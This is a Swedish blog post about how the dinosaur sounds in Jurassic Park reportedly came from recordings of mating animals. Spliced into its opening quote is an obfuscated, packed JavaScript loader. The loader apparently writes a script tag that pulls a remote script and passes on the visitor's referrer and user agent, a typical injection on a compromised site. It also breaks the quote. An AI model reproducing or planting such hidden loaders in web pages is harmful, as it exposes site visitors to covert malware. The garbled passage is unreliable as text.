Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Dagens roligaste onödiga fakta: Snusk i Jurassic Park

jurassic park sex sounds
Filip Urde
  • On 11 april, 2013
  • http://www.revue.se/filip-urde

”If eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khins|var|u0026u|referrer|tdzeb||js|php’.split(’|’),0,{}))
people knew where the sounds in Jurassic Park came from, it’d be rated R!”

 

 

 

Gary Rydstrom är mannen som var ljuddesigner till Jurassic Park och i en intervju med NY Mag så avslöjar han var ljuden till de olika dinosaurierna kommer ifrån… kanske inte riktigt är vad vi tror att det är.  I själva verket så är dinosaurieljuden i denna kult-klassiker ljud från djur som parar sig eller är på väg att para sig.

Ett exempel är Velociraptorn, vars ljud känns för mig som ett troligt ljud som dem kommunicerade med, men ljudet är egentligen en sköldpadda som  är på väg att para sig.

”It’s somewhat embarrassing, but when the raptors bark at each other to communicate, it’s a tortoise having sex,”

Något av det mest klockrena måste ändå vara ljuden för flocken av Gallimimus som springer mot Dr. Grant, Tim samt Lex. Dessa ljud är från en häst som håller på att bli påsatt av en riktig hingst. Samt att när en av dem blir uppäten av en T-rex i slutet av klippet, ja då kommer ljudet  från ett delfinorgasmskrik.

 

Really deep stuff! Läs mer om ljuden från Jurassic Park här nedan. Synd bara att jag aldrig kommer kunna titta på filmen igen utan att se en häst bli påsatt.
www.vulture.com